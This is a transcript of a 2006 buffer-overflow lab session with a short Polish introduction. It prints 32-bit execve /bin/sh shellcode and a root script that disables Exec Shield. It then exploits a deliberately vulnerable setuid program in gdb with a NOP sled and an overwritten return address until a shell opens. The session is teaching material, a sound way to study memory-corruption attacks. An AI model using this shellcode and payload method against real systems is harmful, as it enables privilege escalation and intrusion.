Buffer Overflow
-- Sebastian Pawlak, 2006.
Sesja pokazująca wykorzystanie błędu typu buffer overflow na stosie do uruchomienia własnego shellcode'u.
Kod źródłowy pliku "sesja2":
[hacka@Jupiter vuln]$ ls
shell.asm vuln.c
[hacka@Jupiter vuln]$ cat shell.asm
BITS 32
jmp short data
start: pop esi
xor eax, eax
mov byte [esi + 7], al
mov long [esi + 8], esi
mov long [esi + 12], eax
mov byte al, 0x0b
mov ebx, esi
lea ecx, [esi + 8]
lea edx, [esi + 12]
int 0x80
xor ebx, ebx
mov eax, ebx
inc eax
int 0x80
data: call start
db '/bin/sh'
[hacka@Jupiter vuln]$ nasm -o shell.bin shell.asm
[hacka@Jupiter vuln]$ ls -l
total 12
-rw-r--r-- 1 hacka hacka 400 Mar 31 22:24 shell.asm
-rw-rw-r-- 1 hacka hacka 45 Mar 31 22:28 shell.bin
-rw-r--r-- 1 hacka hacka 190 Mar 31 22:24 vuln.c
[hacka@Jupiter vuln]$ od -tx1 shell.bin
0000000 eb 1f 5e 31 c0 88 46 07 89 76 08 89 46 0c b0 0b
0000020 89 f3 8d 4e 08 8d 56 0c cd 80 31 db 89 d8 40 cd
0000040 80 e8 dc ff ff ff 2f 62 69 6e 2f 73 68
0000055
[hacka@Jupiter vuln]$ od -tc shell.bin
0000000 353 037 ^ 1 300 210 F \a 211 v \b 211 F \f 260 \v
0000020 211 363 215 N \b 215 V \f 315 200 1 333 211 330 @ 315
0000040 200 350 334 377 377 377 / b i n / s h
0000055
[hacka@Jupiter vuln]$ gcc -g -o vuln vuln.c
[hacka@Jupiter vuln]$ su root
Password:
[root@Jupiter vuln]# chown root.root vuln
[root@Jupiter vuln]# chmod u+s vuln
[root@Jupiter vuln]# exit
[hacka@Jupiter vuln]$ ls -l
total 24
-rw-r--r-- 1 hacka hacka 400 Mar 31 22:24 shell.asm
-rw-rw-r-- 1 hacka hacka 45 Mar 31 22:28 shell.bin
-rwsrwxr-x 1 root root 10651 Mar 31 22:31 vuln
-rw-r--r-- 1 hacka hacka 190 Mar 31 22:24 vuln.c
[hacka@Jupiter vuln]$ ./vuln aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
[hacka@Jupiter vuln]$ ./vuln aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Segmentation fault
[hacka@Jupiter vuln]$ su root
Password:
[root@Jupiter vuln]# cat ../\!/unprotect.sh
#!/bin/bash
# Lab helper run as root before the demo: switches off two kernel-level
# exploit mitigations on this Red Hat box so that the stack-overflow session
# that follows behaves deterministically.
# Exec Shield is Red Hat's mechanism intended to keep stack/data memory
# non-executable; setting it to 0 lets code placed on the stack run.
/sbin/sysctl -w kernel.exec-shield=0
# Turns off address-space layout randomization so stack addresses stay the
# same between runs. This sysctl key is not present on every kernel — the
# session transcript shows it being rejected as an unknown key here.
/sbin/sysctl -w kernel.randomize_va_space=0
[root@Jupiter vuln]# cd ../\!/
[root@Jupiter !]# ./unprotect.sh
kernel.exec-shield = 0
error: 'kernel.randomize_va_space' is an unknown key
[root@Jupiter !]# cd ../vuln
[root@Jupiter vuln]# exit
[hacka@Jupiter vuln]$ gdb ./vuln
GNU gdb Red Hat Linux (6.0post-0.20040223.19rh)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...Using host libthread_db lib
rary "/lib/tls/libthread_db.so.1".
(gdb) set args aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
(gdb) r
Starting program: /home/hacka/vuln/vuln aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaa
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
(gdb) b func
Breakpoint 1 at 0x8048379: file vuln.c, line 7.
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/hacka/vuln/vuln aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaa
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Breakpoint 1, func (p=0xfefff966 'a' <repeats 200 times>...) at vuln.c:7
7 strcpy(buf, p);
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
(gdb) set args `perl -e 'print "\x90"x211'; cat shell.bin; perl -e 'print "\x99\
x99\x99\x99"x2'`
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/hacka/vuln/vuln `perl -e 'print "\x90"x211'; cat shell.b
in; perl -e 'print "\x99\x99\x99\x99"x2'`
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Breakpoint 1, func (p=0xfefff98a '\220' <repeats 200 times>...) at vuln.c:7
7 strcpy(buf, p);
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()
(gdb) info reg
eax 0x0 0
ecx 0xfffffcf5 -779
edx 0xfefffa93 -16778605
ebx 0x61dffc 6414332
esp 0xfefff708 0xfefff708
ebp 0x90909090 0x90909090
esi 0x2 2
edi 0x6200fc 6422780
eip 0x90909090 0x90909090
eflags 0x210286 2163334
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) x/s 0xfefff708
0xfefff708: '\220' <repeats 75 times>, " \037^1 \210F\a\211v\b\211F\f \v\21
1 \215N\n\215V\f \2001 \211 @ \200 /bin/sh\231\231\231\231\231\231\231\231"
(gdb) x/s 0xfefff708-100
0xfefff6a4: '\220' <repeats 175 times>, " \037^1 \210F\a\211v\b\211F\f \b\2
11 \215N\b\215V\f "...
(gdb) set args `perl -e 'print "\x90"x211'; cat shell.bin; perl -e 'print "\xa4\
xf6\xff\xfe"x2'`
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/hacka/vuln/vuln `perl -e 'print "\x90"x211'; cat shell.b
in; perl -e 'print "\xa4\xf6\xff\xfe"x2'`
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Breakpoint 1, func (p=0xfefff98a '\220' <repeats 200 times>...) at vuln.c:7
7 strcpy(buf, p);
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()
(gdb) set args `perl -e 'print "\x90"x211'; cat shell.bin; perl -e 'print "\xa4\
xf6\xff\xfe"x4'`
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/hacka/vuln/vuln `perl -e 'print "\x90"x211'; cat shell.b
in; perl -e 'print "\xa4\xf6\xff\xfe"x4'`
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Breakpoint 1, func (p=0xfefff982 '\220' <repeats 200 times>...) at vuln.c:7
7 strcpy(buf, p);
(gdb) cont
Continuing.
sh-2.05b$





